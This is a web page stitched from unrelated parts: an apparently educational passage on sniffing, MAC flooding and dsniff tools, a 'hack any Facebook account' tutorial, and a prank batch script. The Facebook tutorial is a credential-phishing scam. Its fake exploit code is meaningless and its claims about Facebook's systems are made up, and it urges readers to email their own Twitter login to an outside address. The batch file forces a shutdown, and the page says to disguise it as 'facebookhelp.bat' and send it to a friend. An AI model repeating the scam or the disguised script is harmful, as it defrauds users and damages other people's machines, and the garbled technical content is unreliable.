Counters against this attack range from using identification schemes such as one-time passwords (e.g. S/Key) to ticketing identification (such as Kerberos). While these may keep sniffing from yielding any productive results, they do not protect the network from an active attack either, as long as the data is neither digitally signed nor encrypted.
In an active attack, the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating as the man-in-the-middle. These have been discussed at length under the discussion covering the various steps involved in a session hijack.
This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number.
 


Passive Sniffing


A packet sniffer is seldom the only tool used for an attack. This is because a sniffer can work only in a common collision domain. A common collision domain is a network segment that is not switched or bridged (i.e. connected through a hub). Any traffic that is not switched or bridged on a network segment can be seen by all machines on that segment. As sniffers gather packets at the Data Link Layer, they can potentially grab all the packets on the LAN of the machine running the sniffer program.
This is because a network with a hub implements a broadcast medium shared by all systems on the LAN. Any data sent across the LAN is actually sent to each and every machine connected to the LAN. If an attacker runs a sniffer on one system on the LAN, he can gather data sent to and from any other system on the LAN. The majority of sniffer tools are ideally suited to sniffing data in a hub environment. These tools are called passive sniffers, as they passively wait for the data to be sent and capture it. They are efficient at silently gathering data from the LAN.

Note
In passive sniffing, the intruder gets access to the network by any of the following methods.

  • By compromising the physical security. An example of this can be the intruder walking into the building with his laptop and capturing data by plugging in to access the network.

  • Using a Trojan horse. Many Trojans have sniffing capability built into them. For instance, the Back Orifice server has a plugin known as "Butt Trumpet". Butt Trumpet will send the attacker an email when the server has been installed. Once the attacker knows that the victim's machine has been compromised, the attacker can then install a packet sniffer and use it.

Active Sniffing



One countermeasure against passive sniffing is to replace the network hub with a switch. Unlike a hub based network, switched ethernet does not broadcast all information to all systems on the LAN. The switch regulates the flow of data between its ports by actively monitoring the MAC address on each port, which helps it pass data only to its intended target.
In other words, the main difference between a switch and hub is that while a hub has no mapping, and thus broadcasts line data to every port on the device, a switch looks at the MAC address associated with each frame passing through it and sends the data to the required connection on the switch.
The switch thereby limits the data that a passive sniffer can gather. If there is a passive sniffer activated on a switched LAN, the sniffer will only be able to see data going to and from one machine - i.e. the system on which it is installed.
However, it must be noted that the development of switched networks was driven by the need for more bandwidth, and not for the need of more secure networks. Since the evolution was not driven by security needs, there are ways to circumvent this network posture and sniff the traffic.
So how does an attacker sniff on a switched LAN? The sniffers for a switched LAN actively inject traffic into the LAN to enable sniffing of the traffic. Hence the term 'active sniffing'. Some of the methods used in the attack include ARP Spoofing, MAC Flooding and MAC Duplicating etc.
EtherFlood


  • EtherFlood floods a switched network with Ethernet frames with random hardware addresses.

  • The effect on some switches is that they start sending all traffic out on all ports so that the attacker is able to sniff all traffic on the network.
In a switched network, the ARP table ensures that IP addresses are mapped to MAC addresses. However, this does not stop sniffing, as we see in ARP Spoofing. One way to sniff in a switched network is to convert the functionality of a switch to that of a hub.
In other words, the aim is to make the switch change its default directed output to the broadcast method. One way of accomplishing this is to foil the switch by flooding the network with too many frames. When this happens, some switches become unable to perform the IP to MAC mappings and then "fail out" to broadcasting.
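The "fail out" behaviour described above, next to the effect of a per-port address limit, as an added toy model (not code from the original page or from any switch vendor). The 3-port switch, the table capacity of 8, the limit of 2 and all MAC addresses are constructed assumptions.

```python
"""Toy model of a learning switch's MAC table (constructed for illustration)."""

PORTS = (1, 2, 3)  # hypothetical 3-port switch


class LearningSwitch:
    def __init__(self, capacity, port_limit=None):
        self.capacity = capacity      # total MAC-table entries available
        self.port_limit = port_limit  # max MACs learned per port; None = unlimited
        self.table = {}               # learned source MAC -> port
        self.blocked = set()          # ports disabled after exceeding port_limit

    def receive(self, port, src, dst):
        """Handle one frame and return the list of ports it is forwarded to."""
        if port in self.blocked:
            return []
        if src not in self.table:
            learned_here = sum(1 for p in self.table.values() if p == port)
            if self.port_limit is not None and learned_here >= self.port_limit:
                self.blocked.add(port)  # violation: shut the port, keep the table
                return []
            if len(self.table) < self.capacity:
                self.table[src] = port  # learning only works while there is room
        if dst in self.table:
            return [self.table[dst]]    # known destination: directed output
        # Unknown destination: fall back to sending out of every other live port.
        return [p for p in PORTS if p != port and p not in self.blocked]


def run_scenario(port_limit):
    """Port 3 sources many addresses, then hosts A (port 1) and B (port 2) talk."""
    sw = LearningSwitch(capacity=8, port_limit=port_limit)
    host_a, host_b = "02:00:00:00:0a:01", "02:00:00:00:0b:02"  # constructed MACs
    for i in range(20):  # constructed burst of never-repeating source addresses
        sw.receive(3, f"02:00:00:00:ff:{i:02x}", "ff:ff:ff:ff:ff:ff")
    sw.receive(1, host_a, host_b)
    sw.receive(2, host_b, host_a)
    final = sw.receive(1, host_a, host_b)  # where does A -> B traffic go now?
    return final, len(sw.table), sorted(sw.blocked)


if __name__ == "__main__":
    print("no per-port limit:", run_scenario(None))
    print("limit of 2 MACs  :", run_scenario(2))
```

Without a limit the table fills from port 3, hosts A and B are never learned, and A's frames to B also leave on port 3; with the limit, port 3 is disabled on its third address and A-to-B traffic stays on port 2.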


dsniff


  • dsniff is a collection of tools for network auditing and penetration testing.

  • dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

  • arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching).

  • sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Written by Dug Song, this collection of tools (bundled with the main dsniff utility) has certain unique functionality. However, they can be categorized as having similar baseline functionality. In general, the tools dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy can be used to sniff on a compromised host behind a firewall and look for interesting content.
These tools can be put to good use by network administrators or be used to obtain sensitive information such as login information that is sent in the clear or is weakly encrypted. These tools can also auto detect various messaging protocols (about 30 are included) when dsniff is launched with the "-m" option.
urlsnarf is capable of intercepting all HTTP requests from the network it is deployed on, and formatting them into the Common Log Format (CLF) used by MS IIS and Apache. This makes it possible to conduct a log analysis by using suitable programs to interpret the results obtained from urlsnarf. urlsnarf is hard-coded to listen on port 80 (where clear text HTTP resides) as well as ports 3128 (MS-proxy) and 8080 (generic proxy).
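Because the output is Common Log Format, an administrator auditing their own segment can measure what cleartext HTTP exposes. The following is an added example (not part of dsniff or of the original page): it parses CLF lines and reports which sites carry sensitive parameter names in the URL, without keeping the values. The sample lines, host names and the list of parameter names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)(?: [^"]*)?" (?P<status>\S+) (?P<size>\S+)$'
)

# Parameter names treated as sensitive (an assumption; extend for your own apps).
SENSITIVE = {"password", "passwd", "pwd", "token", "sessionid"}

# Constructed sample lines, not real captures.
SAMPLE = """\
10.0.0.5 - - [21/Feb/2011:10:15:32 +0000] "GET http://intranet.example/login?user=alice&password=hunter2 HTTP/1.1" - -
10.0.0.7 - - [21/Feb/2011:10:15:40 +0000] "GET http://www.example/index.html HTTP/1.1" - -
10.0.0.5 - - [21/Feb/2011:10:16:02 +0000] "GET http://wiki.example:8080/view?page=Home&sessionid=abc123 HTTP/1.0" - -
this line is truncated "GET
"""


def audit(log_text):
    """Return (findings, skipped) for cleartext requests exposing sensitive names.

    Each finding is (client, site, [parameter names]); values are never stored.
    """
    findings, skipped = [], 0
    for line in log_text.splitlines():
        m = CLF_RE.match(line.strip())
        if not m:
            skipped += 1  # malformed or truncated line: count it, do not guess
            continue
        parts = urlsplit(m["url"])
        names = {k.lower() for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
        exposed = sorted(names & SENSITIVE)
        if exposed:
            findings.append((m["client"], parts.netloc, exposed))
    return findings, skipped


if __name__ == "__main__":
    for client, site, names in audit(SAMPLE)[0]:
        print(f"{site}: {', '.join(names)} sent in the clear by {client}")
```

Each site reported is a candidate for moving to HTTPS and for taking credentials out of the URL.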
arpspoof, dnsspoof, and macof work on the interception of switched network traffic that is usually unavailable to a sniffer program due to the segment switching that occurs at the ISO layer 2 level. sshmitm and webmitm implement active man-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
⇒ Learn How To Hack Any FaceBook Account Using A Web Based Exploit
Do you want to learn how to hack facebook?, Are you looking for a way to hack your friends facebook account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack facebook user accounts without having to directly hack into facebook and risk getting caught. Ignore all those hacking services, facebook hacks and hackers that charge you money for something you can do on your own for free. Hack the password of any of your friends accounts and get their password even as a prank or joke (you may also be interested in trying our How To Hack Twitter Accounts tutorial).

Hack facebook, hacking facebook passwords from user accounts and find out someones facebook password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe Facebook is with a few celebrities having had their accounts hacked. You may also have seen Twitter allows you to synchronize your tweets with Facebook status updates so whatever you tweet appears as a Facebook status update. In providing this service, Facebook has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Facebooks API service which permits exterior websites or applications (like FarmVille) to modify or post stuff on your profile.

A couple of month's ago I wanted to check my old FaceBook account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a facebook account hacking code or exploit as they are called.
HOW HACKING FACEBOOK ACCOUNTS WORKS
Facebook has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned FaceBook uses something similar to an email service to contact their databases.

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Facebooks 'Mutual Friend' feature, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Facebook...you can use your Twitter account to verify your their friend on Facebook taking advantage of the vulnerability of the twitter status sync exploit, and get their login email and password sent to you. But the victim must be on your friends list on Facebook.
HOW TO DO IT
1) First off you will need to get your user id and the victims user id, how do you do this?

Go to the victims profile, then click on their Display Picture (not the "View Photos of ..." link or tab but the actual main picture of their profile) and look at your browsers address bar, at the end of all the address you should see a group of numbers that should you should look something like this: (I have used a red arrow to point them out)



Don't worry if it isn't exactly like that (sometimes it has variations like; 'album.php?profile=10957800008') just as long as you get the numbers. Write them down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the facebook user id of the victim and the twitter friend authentication information. I will give you step by step examples by trying the exploit code on my friend Laura's account as the victim, see what parts you have to edit and with what:



1. Should be the victims user id.
2. Should be your twitter login Username (I put my email in the screencap example above for privacy reasons) to verify your the victims mutual friend on facebook. Make sure your facebook email was the same used to sign up to Twitter so the exploit script can automatically connect both accounts.
3. Should be your twitter password so the database can authentic you really are friends with the victim on facebook.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to fbsupport@techie.com which is their customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
$[search_database = $find user+id= "123456789", '%verification+user+bday' = }"01/01/1900"{ begin_search();


Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:



1. The email address of the facebook database's forgotten password customer service.
2. This is where you insert the victims facebook user id.
3. This is where you insert your birthday so the database can find you to verify your a friend of the victim (it arranges users in the database based on your date of birth), NOTE: It MUST be in the MONTH/DAY/YEAR format so it can read it properly.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email.Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic FaceBook has that day, this is a sample of the email response you'll receive:


THE EXPLOIT CODE
fb_select_db("find", $linkID) or die(fbdatabase_error());
$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(fbdatabase_error());

$num_rows = db_num_rows($resultID);
$row = facebook_fetch_array($resultID);
$user_id = $row[0];

if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while ($i <= 7) {
$num = decrypt() % 33;
$tmp = substr($salt, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}

mail($email_address, $subject, $message, "Facebook Password Reset Confirmation


}
/end$
Fake virus: what do I mean?
This is not a virus at all and has no lasting effect. It just shuts down your friend's system once and shows "your facebook account is hacked" (for fun only).


What is the code?
So far we have created a lot of viruses using Batch programming. This time we are also going to use Batch programming.

Code:
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

What you should do with this code?
Copy this code and paste in notepad
Save the file with .bat extension.(for eg: facebookhelp.bat)
Now sent this file to your friend and ask to click.

What this will do?
First it will show the "WARNING VIRUS DETECTED!!!!! AFTE.........." message in cmd.
Then it will shut down. Before shutting down it will show the "SORRY!!! YOUR ....." message in cmd.